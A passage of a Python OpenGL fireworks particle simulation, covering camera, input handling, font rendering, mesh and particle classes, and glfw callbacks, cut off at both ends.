infoTextIndex += 1\n\n if self.trail == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.# NumFireworks: {0}'.format(self.fireworksCount))\n infoTextIndex += 1\n\n textPosX = 590.0\n textPosY = 570.0\n\n upMaxIndex = 4\n\n for i in range(upMaxIndex):\n glTranslate(textPosX, textPosY, 0.0)\n \n glListBase(self.font.GetListOffset())\n glCallLists([ord(c) for c in infoText[i]])\n\n glPopMatrix()\n glPushMatrix()\n glLoadIdentity()\n\n textPosY -= 20\n\n textPosY -= 85.0\n\n for i in range(upMaxIndex, self.numProgramInfoElement - 1):\n glTranslate(textPosX, textPosY, 0.0)\n\n glListBase(self.font.GetListOffset())\n glCallLists([ord(c) for c in infoText[i]])\n\n glPopMatrix()\n glPushMatrix()\n glLoadIdentity()\n\n textPosY -= 20\n\n glTranslate(textPosX, textPosY, 0.0)\n\n glCallLists([ord(c) for c in infoText[self.numProgramInfoElement - 1]])\n\n glPopAttrib()\n\n glPopMatrix() \n\nclass InputManager:\n def __init__(self):\n self.mouseEntered = False\n\n self.lastMousePos = [-1, -1]\n\n self.keys = {}\n\n def GetMouseEntered(self):\n return self.mouseEntered\n\n def SetMouseEntered(self, value):\n self.mouseEntered = value\n\n def GetLastMousePos(self):\n return self.lastMousePos\n\n def SetLastMousePos(self, value):\n self.lastMousePos = value\n\n def GetKeyState(self, key):\n if key in self.keys.keys():\n return self.keys[key]\n\n def SetKeyState(self, key, value):\n self.keys[key] = value\n\nclass Camera:\n def __init__(self):\n self.cameraPos = glm.vec3(0.0, 0.0, 30.0)\n self.cameraFront = glm.vec3(0.0, 0.0, -1.0)\n self.cameraUp = glm.vec3(0.0, 1.0, 0.0)\n self.cameraRight = glm.vec3(1.0, 0.0, 0.0)\n self.cameraWorldUp = glm.vec3(0.0, 1.0, 0.0)\n\n self.pitch = 0.0\n self.yaw = 180.0\n\n self.mouseSensitivity = 0.1\n\n self.UpdateCameraVectors()\n\n def GetViewMat(self):\n return glm.lookAt(self.cameraPos, self.cameraPos + self.cameraFront, self.cameraUp)\n\n def ProcessMouseMovement(self, xOffset, yOffset, constrainPitch = True):\n xOffset *= self.mouseSensitivity\n yOffset *= self.mouseSensitivity\n\n self.yaw += xOffset\n self.pitch += yOffset\n\n if constrainPitch == True:\n if self.pitch > 89.0:\n self.pitch = 89.0\n elif self.pitch < -89.0:\n self.pitch = -89.0\n\n 
self.UpdateCameraVectors()\n\n def ProcessKeyboard(self, direction, velocity):\n if direction == \"FORWARD\":\n self.cameraPos += self.cameraFront * velocity\n elif direction == \"BACKWARD\":\n self.cameraPos -= self.cameraFront * velocity\n elif direction == \"LEFT\":\n self.cameraPos += self.cameraRight * velocity\n elif direction == \"RIGHT\":\n self.cameraPos -= self.cameraRight * velocity\n\n def UpdateCameraVectors(self):\n self.cameraFront.x = math.sin(glm.radians(self.yaw)) * math.cos(glm.radians(self.pitch))\n self.cameraFront.y = math.sin(glm.radians(self.pitch))\n self.cameraFront.z = math.cos(glm.radians(self.yaw)) * math.cos(glm.radians(self.pitch))\n\n self.cameraFront = glm.normalize(self.cameraFront)\n\n self.cameraRight = glm.normalize(glm.cross(self.cameraWorldUp, self.cameraFront))\n self.cameraUp = glm.normalize(glm.cross(self.cameraFront, self.cameraRight))\n\nclass Mesh:\n def __init__(self, shader, dataType = -1):\n self.vertices = []\n self.indices = []\n\n self.modelMat = glm.mat4()\n\n self.rotDegree = 0.0\n\n self.shader = shader\n self.dataType = dataType\n\n if self.dataType == -1:\n self._GenerateCube()\n\n self.VAO = glGenVertexArrays(1)\n\n VBO = glGenBuffers(1)\n EBO = glGenBuffers(1)\n\n glBindVertexArray(self.VAO)\n\n glBindBuffer(GL_ARRAY_BUFFER, VBO)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, EBO)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.indices.nbytes, self.indices, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(self.vertices.itemsize * 3))\n\n glEnableVertexAttribArray(2)\n glVertexAttribPointer(2, 2, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(self.vertices.itemsize * 6))\n\n glBindBuffer(GL_ARRAY_BUFFER, 0);\n\n glBindVertexArray(0)\n\n def Restart(self):\n return\n\n def Update(self, deltaTime):\n rotRadian = glm.radians(self.rotDegree)\n\n rotXMat = glm.rotate(rotRadian, glm.vec3(1.0, 0.0, 0.0))\n rotYMat = glm.rotate(rotRadian, glm.vec3(0.0, 1.0, 0.0))\n rotZMat = glm.rotate(rotRadian, glm.vec3(0.0, 0.0, 1.0))\n\n self.modelMat = rotZMat * rotYMat * rotXMat\n #self.modelMat = rotYMat\n #self.modelMat = glm.mat4()\n\n self.rotDegree += deltaTime * 50.0\n\n if self.rotDegree > 360.0:\n self.rotDegree = 0.0\n\n def Draw(self):\n self.shader.SetMat4('modelMat', self.modelMat)\n\n glBindVertexArray(self.VAO)\n glDrawElements(GL_TRIANGLES, len(self.indices), GL_UNSIGNED_INT, None)\n glBindVertexArray(0)\n\n def _GenerateCube(self):\n cubeVerticesData = [\n # Front\n -0.5, -0.5, 0.5, 1.0, 0.0, 0.0, 0.0, 0.0,\n 0.5, -0.5, 0.5, 1.0, 0.0, 0.0, 1.0, 0.0,\n 0.5, 0.5, 0.5, 1.0, 0.0, 0.0, 1.0, 1.0,\n -0.5, 0.5, 0.5, 1.0, 0.0, 0.0, 0.0, 1.0,\n\n # Back\n 0.5, -0.5, -0.5, 0.0, 1.0, 0.0, 0.0, 0.0,\n -0.5, -0.5, -0.5, 0.0, 1.0, 0.0, 1.0, 0.0,\n -0.5, 0.5, -0.5, 0.0, 1.0, 0.0, 1.0, 1.0,\n 0.5, 0.5, -0.5, 0.0, 1.0, 0.0, 0.0, 1.0,\n\n # Left\n -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 0.0, 0.0,\n -0.5, -0.5, 0.5, 0.0, 0.0, 1.0, 1.0, 0.0,\n -0.5, 0.5, 0.5, 0.0, 0.0, 1.0, 1.0, 1.0,\n -0.5, 0.5, -0.5, 0.0, 0.0, 1.0, 0.0, 1.0,\n\n # Right\n 0.5, -0.5, 0.5, 1.0, 1.0, 0.0, 0.0, 0.0,\n 0.5, -0.5, -0.5, 1.0, 1.0, 0.0, 1.0, 0.0,\n 0.5, 0.5, -0.5, 1.0, 1.0, 0.0, 1.0, 1.0,\n 0.5, 0.5, 0.5, 1.0, 1.0, 0.0, 0.0, 1.0,\n\n # Top\n -0.5, 0.5, 0.5, 0.0, 1.0, 1.0, 
0.0, 0.0,\n 0.5, 0.5, 0.5, 0.0, 1.0, 1.0, 1.0, 0.0,\n 0.5, 0.5, -0.5, 0.0, 1.0, 1.0, 1.0, 1.0,\n -0.5, 0.5, -0.5, 0.0, 1.0, 1.0, 0.0, 1.0,\n\n # Bottom\n -0.5, -0.5, -0.5, 1.0, 0.0, 1.0, 0.0, 0.0,\n 0.5, -0.5, -0.5, 1.0, 0.0, 1.0, 1.0, 0.0,\n 0.5, -0.5, 0.5, 1.0, 0.0, 1.0, 1.0, 1.0,\n -0.5, -0.5, 0.5, 1.0, 0.0, 1.0, 0.0, 1.0\n ]\n\n cubeIndicesData = [\n 0, 1, 2, 2, 3, 0,\n 4, 5, 6, 6, 7, 4,\n 8, 9, 10, 10, 11, 8,\n 12, 13, 14, 14, 15, 12,\n 16, 17, 18, 18, 19, 16,\n 20, 21, 22, 22, 23, 20\n ]\n\n self.vertices = np.array(cubeVerticesData, dtype = np.float32)\n self.indices = np.array(cubeIndicesData, dtype = np.uint32)\n\nclass Shader:\n def __init__(self, vsCode, fsCode):\n self.program = None\n\n self.program = compileProgram(compileShader(vsCode, GL_VERTEX_SHADER), compileShader(fsCode, GL_FRAGMENT_SHADER))\n\n def Use(self):\n glUseProgram(self.program)\n\n def SetMat4(self, name, value):\n loc = glGetUniformLocation(self.program, name)\n\n value = np.array(value, dtype = np.float32)\n glUniformMatrix4fv(loc, 1, GL_TRUE, value)\n\nclass Font:\n def __init__(self, fontName, size):\n self.face = ft.Face(fontName)\n self.face.set_char_size(size << 6)\n\n self.charsSize = (6, 16)\n self.charsAdvanceX = []\n\n self.maxCharHeight = 0\n self.charStartOffset = 32\n self.listOffset = -1\n self.texId = -1\n\n numChars = self.charsSize[0] * self.charsSize[1]\n\n self.charsAdvanceX = [0 for i in range(numChars)]\n\n advanceX, ascender, descender = 0, 0, 0\n charEndIndex = self.charStartOffset + numChars\n\n for c in range(self.charStartOffset, charEndIndex):\n self.face.load_char(chr(c), ft.FT_LOAD_RENDER | ft.FT_LOAD_FORCE_AUTOHINT)\n\n self.charsAdvanceX[c - self.charStartOffset] = self.face.glyph.advance.x >> 6\n\n advanceX = max(advanceX, self.face.glyph.advance.x >> 6)\n ascender = max(ascender, self.face.glyph.metrics.horiBearingY >> 6)\n descender = max(descender, (self.face.glyph.metrics.height >> 6) - (self.face.glyph.metrics.horiBearingY >> 6))\n\n self.maxCharHeight = ascender + descender\n maxTotalAdvanceX = advanceX * self.charsSize[1]\n maxTotalHeight = self.maxCharHeight * self.charsSize[0]\n\n exponent = 0\n bitmapDataSize = [0, 0]\n\n while maxTotalAdvanceX > math.pow(2, exponent):\n exponent += 1\n bitmapDataSize[1] = int(math.pow(2, exponent))\n\n exponent = 0\n\n while maxTotalHeight > math.pow(2, exponent):\n exponent += 1\n bitmapDataSize[0] = int(math.pow(2, exponent))\n\n self.bitmapData = np.zeros((bitmapDataSize[0], bitmapDataSize[1]), dtype = np.ubyte)\n\n x, y, charIndex = 0, 0, 0\n\n for r in range(self.charsSize[0]):\n for c in range(self.charsSize[1]):\n self.face.load_char(chr(self.charStartOffset + r * self.charsSize[1] + c), ft.FT_LOAD_RENDER | ft.FT_LOAD_FORCE_AUTOHINT)\n\n charIndex = r * self.charsSize[1] + c\n\n bitmap = self.face.glyph.bitmap\n x += self.face.glyph.bitmap_left\n y = r * self.maxCharHeight + ascender - self.face.glyph.bitmap_top\n\n self.bitmapData[y : y + bitmap.rows, x : x + bitmap.width].flat = bitmap.buffer\n\n x += self.charsAdvanceX[charIndex] - self.face.glyph.bitmap_left\n\n x = 0\n\n def GetTexId(self):\n return self.texId\n\n def GetListOffset(self):\n return self.listOffset\n\n def MakeFontTextureWithGenList(self):\n self.texId = glGenTextures(1)\n\n glBindTexture(GL_TEXTURE_2D, self.texId)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameterf(GL_TEXTURE_2D, 
GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n\n self.bitmapData = np.flipud(self.bitmapData)\n\n glTexImage2D(GL_TEXTURE_2D, 0, GL_ALPHA, self.bitmapData.shape[1], self.bitmapData.shape[0], 0,\n GL_ALPHA, GL_UNSIGNED_BYTE, self.bitmapData)\n\n dx = 0.0\n dy = self.maxCharHeight / float(self.bitmapData.shape[0])\n\n listStartIndex = glGenLists(self.charsSize[0] * self.charsSize[1])\n self.listOffset = listStartIndex - self.charStartOffset\n\n for r in range(self.charsSize[0]):\n for c in range(self.charsSize[1]):\n glNewList(listStartIndex + r * self.charsSize[1] + c, GL_COMPILE)\n\n charIndex = r * self.charsSize[1] + c\n\n advanceX = self.charsAdvanceX[charIndex]\n dAdvanceX = advanceX / float(self.bitmapData.shape[1])\n\n glBegin(GL_QUADS)\n glTexCoord2f(dx, 1.0 - r * dy), glVertex3f(0.0, 0.0, 0.0)\n glTexCoord2f(dx + dAdvanceX, 1.0 - r * dy), glVertex3f(advanceX, 0.0, 0.0)\n glTexCoord2f(dx + dAdvanceX, 1.0 - (r + 1) * dy), glVertex3f(advanceX, -self.maxCharHeight, 0.0)\n glTexCoord2f(dx, 1.0 - (r + 1) * dy), glVertex3f(0.0, -self.maxCharHeight, 0.0)\n glEnd()\n\n glTranslate(advanceX, 0.0, 0.0)\n\n glEndList()\n\n dx += dAdvanceX\n\n glTranslatef(0.0, -self.maxCharHeight, 0.0)\n dx = 0.0\n\nclass Firework:\n def __init__(self, externalForce):\n self.particlesBeforeExplosionVertices = []\n self.particlesBeforeExplosionTrailVertices = []\n self.particlesAfterExplosionVertices =[]\n self.particlesAfterExplosionTrailVertices = []\n\n self.externalForce = externalForce\n self.numTrailParticles = 20\n self.trail = False\n\n posInterval = 30.0\n\n particleBeforeExplosionPos = glm.vec3(0.0, 0.0, 0.0)\n particleBeforeExplosionPos.x = (random.random() - 0.5) * posInterval\n particleBeforeExplosionPos.y = -10.0\n particleBeforeExplosionPos.z = (random.random() - 0.5) * posInterval\n\n self.particlesBeforeExplosion = Particle(self.externalForce, particleBeforeExplosionPos, False, self.numTrailParticles)\n self.particlesAfterExplosion = []\n\n self.color = [random.random(), random.random(), random.random()]\n\n self.numParticlesAfterExplosion = 100\n self.exploded = False\n\n self.VAO = glGenVertexArrays(4)\n self.VBO = glGenBuffers(4)\n\n self._InitializeVertexArray()\n\n def SetTrail(self, value):\n self.trail = value\n\n def Update(self, deltaTime):\n if self.exploded == False:\n self.particlesBeforeExplosion.Update(deltaTime)\n\n particlesBeforeExplosionVel = self.particlesBeforeExplosion.GetVelocity()\n\n if particlesBeforeExplosionVel.y < 0.0:\n self.exploded = True\n\n self.Explode()\n else:\n numCurrentParticlesAfterExplosion = len(self.particlesAfterExplosion)\n\n for i in range(numCurrentParticlesAfterExplosion - 1, -1, -1):\n self.particlesAfterExplosion[i].Update(deltaTime)\n\n if self.particlesAfterExplosion[i].Done():\n self.particlesAfterExplosion.pop(i)\n\n def Explode(self):\n for i in range(self.numParticlesAfterExplosion):\n particlesBeforeExplosionPos = self.particlesBeforeExplosion.GetPosition()\n self.particlesAfterExplosion.append(Particle(self.externalForce, particlesBeforeExplosionPos, True, self.numTrailParticles))\n\n def Done(self):\n if self.exploded == True and len(self.particlesAfterExplosion) == 0:\n return True\n else:\n return False\n\n def Draw(self):\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT | GL_POINT_BIT)\n\n glEnable(GL_POINT_SMOOTH)\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n if self.exploded == False:\n glPointSize(5.0)\n \n particlesBeforeExplosionPos = self.particlesBeforeExplosion.GetPosition()\n\n 
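# Each vertex in these dynamic buffers is an interleaved [x, y, z, r, g, b, a] record of seven floats (see _InitializeVertexArray); only the three position floats change per frame, so glBufferSubData below rewrites them in place instead of reallocating the whole GL_DYNAMIC_DRAW buffer with glBufferData.\n            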
self.particlesBeforeExplosionVertices[0] = particlesBeforeExplosionPos.x\n self.particlesBeforeExplosionVertices[1] = particlesBeforeExplosionPos.y\n self.particlesBeforeExplosionVertices[2] = particlesBeforeExplosionPos.z\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[0])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesBeforeExplosionVertices.itemsize * 3, self.particlesBeforeExplosionVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[0])\n glDrawArrays(GL_POINTS, 0, 1)\n\n if self.trail == True:\n particlesBeforeExplosionTrailPos = self.particlesBeforeExplosion.GetTrailPosition()\n\n alphaInterval = 1.0 / self.numTrailParticles\n\n for i in range(self.numTrailParticles):\n self.particlesBeforeExplosionTrailVertices[i * 7 + 0] = particlesBeforeExplosionTrailPos[i].x\n self.particlesBeforeExplosionTrailVertices[i * 7 + 1] = particlesBeforeExplosionTrailPos[i].y\n self.particlesBeforeExplosionTrailVertices[i * 7 + 2] = particlesBeforeExplosionTrailPos[i].z\n\n self.particlesBeforeExplosionTrailVertices[i * 7 + 6] = 1.0 - (i * alphaInterval)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[1])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesBeforeExplosionTrailVertices.nbytes, self.particlesBeforeExplosionTrailVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[1])\n glDrawArrays(GL_POINTS, 0, 1 * self.numTrailParticles)\n\n glBindVertexArray(0)\n else:\n glPointSize(2.0)\n\n numCurrentParticlesAfterExplosion = len(self.particlesAfterExplosion)\n\n for i in range(numCurrentParticlesAfterExplosion):\n particlesAfterExplosionPos = self.particlesAfterExplosion[i].GetPosition()\n particlesAfterExplosionLifespan = self.particlesAfterExplosion[i].GetLifespan()\n\n self.particlesAfterExplosionVertices[i * 7 + 0] = particlesAfterExplosionPos.x\n self.particlesAfterExplosionVertices[i * 7 + 1] = particlesAfterExplosionPos.y\n self.particlesAfterExplosionVertices[i * 7 + 2] = particlesAfterExplosionPos.z\n\n self.particlesAfterExplosionVertices[i * 7 + 6] = particlesAfterExplosionLifespan\n\n if self.trail == True:\n particlesAfterExplosionTrailPos = self.particlesAfterExplosion[i].GetTrailPosition()\n\n alphaInterval = particlesAfterExplosionLifespan / self.numTrailParticles\n\n for j in range(self.numTrailParticles):\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 0] = particlesAfterExplosionTrailPos[j].x\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 1] = particlesAfterExplosionTrailPos[j].y\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 2] = particlesAfterExplosionTrailPos[j].z\n\n self.particlesAfterExplosionTrailVertices[(i * self.numTrailParticles * 7) + (j * 7) + 6] = particlesAfterExplosionLifespan - (j * alphaInterval)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[2])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesAfterExplosionVertices.nbytes, self.particlesAfterExplosionVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[2])\n glDrawArrays(GL_POINTS, 0, self.numParticlesAfterExplosion)\n\n if self.trail == True:\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[3])\n glBufferSubData(GL_ARRAY_BUFFER, 0, self.particlesAfterExplosionTrailVertices.nbytes, self.particlesAfterExplosionTrailVertices)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n glBindVertexArray(self.VAO[3])\n glDrawArrays(GL_POINTS, 0, numCurrentParticlesAfterExplosion * self.numTrailParticles)\n\n glBindVertexArray(0)\n\n glPopAttrib()\n\n def 
_InitializeVertexArray(self):\n particlesBeforeExplosionVerticesData = []\n particlesBeforeExplosionTrailVerticesData = []\n particlesAfterExplosionVerticesData = []\n particlesAfterExplosionTrailVerticesData = []\n\n for i in range(1):\n particlesBeforeExplosionVerticesData.append(0.0)\n particlesBeforeExplosionVerticesData.append(0.0)\n particlesBeforeExplosionVerticesData.append(0.0)\n\n #particlesBeforeExplosionVerticesData.append(self.color[0])\n #particlesBeforeExplosionVerticesData.append(self.color[1])\n #particlesBeforeExplosionVerticesData.append(self.color[2])\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(random.random())\n particlesBeforeExplosionVerticesData.append(1.0)\n\n for j in range(self.numTrailParticles):\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n particlesBeforeExplosionTrailVerticesData.append(0.0)\n\n #particlesBeforeExplosionTrailVerticesData.append(self.color[0])\n #particlesBeforeExplosionTrailVerticesData.append(self.color[1])\n #particlesBeforeExplosionTrailVerticesData.append(self.color[2])\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(random.random())\n particlesBeforeExplosionTrailVerticesData.append(1.0)\n\n for i in range(self.numParticlesAfterExplosion):\n particlesAfterExplosionVerticesData.append(0.0)\n particlesAfterExplosionVerticesData.append(0.0)\n particlesAfterExplosionVerticesData.append(0.0)\n\n #particlesAfterExplosionVerticesData.append(self.color[0])\n #particlesAfterExplosionVerticesData.append(self.color[1])\n #particlesAfterExplosionVerticesData.append(self.color[2])\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(random.random())\n particlesAfterExplosionVerticesData.append(1.0)\n\n for j in range(self.numTrailParticles):\n particlesAfterExplosionTrailVerticesData.append(0.0)\n particlesAfterExplosionTrailVerticesData.append(0.0)\n particlesAfterExplosionTrailVerticesData.append(0.0)\n\n particlesAfterExplosionTrailVerticesData.append(random.random())\n particlesAfterExplosionTrailVerticesData.append(random.random())\n particlesAfterExplosionTrailVerticesData.append(random.random())\n #particlesAfterExplosionTrailVerticesData.append(self.color[0])\n #particlesAfterExplosionTrailVerticesData.append(self.color[1])\n #particlesAfterExplosionTrailVerticesData.append(self.color[2])\n particlesAfterExplosionTrailVerticesData.append(1.0)\n\n self.particlesBeforeExplosionVertices = np.array(particlesBeforeExplosionVerticesData, dtype = np.float32)\n self.particlesBeforeExplosionTrailVertices = np.array(particlesBeforeExplosionTrailVerticesData, dtype = np.float32)\n self.particlesAfterExplosionVertices = np.array(particlesAfterExplosionVerticesData, dtype = np.float32)\n self.particlesAfterExplosionTrailVertices = np.array(particlesAfterExplosionTrailVerticesData, dtype = np.float32)\n\n glBindVertexArray(self.VAO[0])\n\n glBindBuffer(GL_ARRAY_BUFFER, self.VBO[0])\n glBufferData(GL_ARRAY_BUFFER, self.particlesBeforeExplosionVertices.nbytes, self.particlesBeforeExplosionVertices, GL_DYNAMIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 
self.particlesBeforeExplosionVertices.itemsize * 7, ctypes.c_void_p(0))\n\n        glEnableVertexAttribArray(1)\n        glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionVertices.itemsize * 7, ctypes.c_void_p(self.particlesBeforeExplosionVertices.itemsize * 3))\n\n        glBindVertexArray(self.VAO[1])\n\n        glBindBuffer(GL_ARRAY_BUFFER, self.VBO[1])\n        glBufferData(GL_ARRAY_BUFFER, self.particlesBeforeExplosionTrailVertices.nbytes, self.particlesBeforeExplosionTrailVertices, GL_DYNAMIC_DRAW)\n\n        glEnableVertexAttribArray(0)\n        glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(0))\n\n        glEnableVertexAttribArray(1)\n        glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesBeforeExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(self.particlesBeforeExplosionTrailVertices.itemsize * 3))\n\n        glBindVertexArray(self.VAO[2])\n\n        glBindBuffer(GL_ARRAY_BUFFER, self.VBO[2])\n        glBufferData(GL_ARRAY_BUFFER, self.particlesAfterExplosionVertices.nbytes, self.particlesAfterExplosionVertices, GL_DYNAMIC_DRAW)\n\n        glEnableVertexAttribArray(0)\n        glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionVertices.itemsize * 7, ctypes.c_void_p(0))\n\n        glEnableVertexAttribArray(1)\n        glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionVertices.itemsize * 7, ctypes.c_void_p(self.particlesAfterExplosionVertices.itemsize * 3))\n\n        glBindVertexArray(self.VAO[3])\n\n        glBindBuffer(GL_ARRAY_BUFFER, self.VBO[3])\n        glBufferData(GL_ARRAY_BUFFER, self.particlesAfterExplosionTrailVertices.nbytes, self.particlesAfterExplosionTrailVertices, GL_DYNAMIC_DRAW)\n\n        glEnableVertexAttribArray(0)\n        glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(0))\n\n        glEnableVertexAttribArray(1)\n        glVertexAttribPointer(1, 4, GL_FLOAT, GL_FALSE, self.particlesAfterExplosionTrailVertices.itemsize * 7, ctypes.c_void_p(self.particlesAfterExplosionTrailVertices.itemsize * 3))\n\n        glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n        glBindVertexArray(0)\n\nclass Particle:\n    def __init__(self, externalForce, pos, exploded, numTrailParticles):\n        self.acceleration = externalForce\n\n        self.lifespan = 1.0\n        self.exploded = exploded\n\n        self.trailPos = []\n        self.numTrailParticles = numTrailParticles\n\n        if self.exploded == False:\n            self.velocity = glm.vec3(0.0, random.random() * 30.0 + 15.0, 0.0)\n        else:\n            ranVec = glm.vec3(random.random() * 2 - 1.0, random.random() * 2 - 1.0, random.random() * 2 - 1.0)\n            ranVec = glm.normalize(ranVec)\n            ranVec *= random.randrange(1, 50)\n            self.velocity = glm.vec3(ranVec.x, ranVec.y, ranVec.z)\n\n        self.pos = glm.vec3(pos.x, pos.y, pos.z)\n\n        for i in range(self.numTrailParticles):\n            self.trailPos.append(glm.vec3(pos.x, pos.y, pos.z))\n\n    def GetVelocity(self):\n        return self.velocity\n\n    def GetPosition(self):\n        return self.pos\n\n    def GetLifespan(self):\n        return self.lifespan\n\n    def GetTrailPosition(self):\n        return self.trailPos\n\n    def Update(self, deltaTime):\n        if self.exploded == True:\n            self.velocity *= 0.85\n            self.lifespan -= 0.02\n\n        self.velocity += self.acceleration * deltaTime\n        self.pos += self.velocity * deltaTime\n\n        newTrailPos = glm.vec3(self.pos.x, self.pos.y, self.pos.z)\n\n        self.trailPos.pop()\n        self.trailPos.insert(0, newTrailPos)\n\n    def Done(self):\n        if self.lifespan < 0.0:\n            return True\n        else:\n            return False\n\ngSceneManager = SceneManager()\ngInputManager = InputManager()\n\n\ndef HandleWindowSizeCallback(glfwWindow, width, 
height):\n glViewport(0, 0, width, height)\n\n gSceneManager.SetDisplaySize(width, height)\n\ndef HandleKeyCallback(glfwWindow, key, scanCode, action, modes):\n if action == glfw.PRESS:\n if key == glfw.KEY_ESCAPE:\n glfw.set_window_should_close(glfwWindow, glfw.TRUE)\n\n if key == glfw.KEY_1:\n gInputManager.SetKeyState('1', True)\n if key == glfw.KEY_2:\n gInputManager.SetKeyState('2', True)\n\n if key == glfw.KEY_B:\n gInputManager.SetKeyState('B', True)\n if key == glfw.KEY_I:\n gInputManager.SetKeyState('I', True)\n if key == glfw.KEY_P:\n gInputManager.SetKeyState('P', True)\n if key == glfw.KEY_R:\n gInputManager.SetKeyState('R', True)\n if key == glfw.KEY_T:\n gInputManager.SetKeyState('T', True)\n\n if key == glfw.KEY_W:\n gInputManager.SetKeyState('W', True)\n elif key == glfw.KEY_S:\n gInputManager.SetKeyState('S', True)\n elif key == glfw.KEY_A:\n gInputManager.SetKeyState('A', True)\n elif key == glfw.KEY_D:\n gInputManager.SetKeyState('D', True)\n\n if action == glfw.RELEASE:\n if key == glfw.KEY_W:\n gInputManager.SetKeyState('W', False)\n elif key == glfw.KEY_S:\n gInputManager.SetKeyState('S', False)\n elif key == glfw.KEY_A:\n gInputManager.SetKeyState('A', False)\n elif key == glfw.KEY_D:\n gInputManager.SetKeyState('D', False)\n\ndef HandleCursorPosCallback(glfwWindow, xPos, yPos):\n if gSceneManager.GetPause() == True:\n return\n\n if gInputManager.GetMouseEntered() == False:\n gInputManager.SetLastMousePos([xPos, yPos])\n gInputManager.SetMouseEntered(True)\n\n lastPos = gInputManager.GetLastMousePos()\n xOffset = lastPos[0] - xPos\n yOffset = lastPos[1] - yPos\n\n gInputManager.SetLastMousePos([xPos, yPos])\n\n camera = gSceneManager.GetCamera()\n camera.ProcessMouseMovement(xOffset, yOffset)\n\n displaySize = gSceneManager.GetDisplaySize()\n\n mouseCheckInterval = 20\n\n if xPos < mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, displaySize[0] - mouseCheckInterval, yPos)\n gInputManager.SetMouseEntered(False)\n elif xPos > displaySize[0] - mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, mouseCheckInterval, yPos)\n gInputManager.SetMouseEntered(False)\n\n if yPos < mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, xPos, displaySize[1] - mouseCheckInterval)\n gInputManager.SetMouseEntered(False)\n elif yPos > displaySize[1] - mouseCheckInterval:\n glfw.set_cursor_pos(glfwWindow, xPos, mouseCheckInterval)\n gInputManager.SetMouseEntered(False)\n\n gSceneManager.SetDirty(True)\n\ndef Main():\n displaySize = gSceneManager.GetDisplaySize()\n\n if not glfw.init():\n return\n\n glfw.window_hint(glfw.VISIBLE, glfw.FALSE)\n\n glfwWindow = glfw.create_window(displaySize[0], displaySize[1], \"Fireworks.Part 1\", None, None)\n\n if not glfwWindow:\n glfw.terminate()\n return\n\n videoMode = glfw.get_video_mode(glfw.get_primary_monitor())\n\n windowWidth = videoMode.size.width\n windowHeight = videoMode.size.height\n windowPosX = int(windowWidth / 2 - displaySize[0] / 2) - 250\n windowPosY = int(windowHeight / 2 - displaySize[1] / 2) - 50\n\n glfw.set_window_pos(glfwWindow, windowPosX, windowPosY)\n\n glfw.show_window(glfwWindow)\n\n glfw.set_input_mode(glfwWindow, 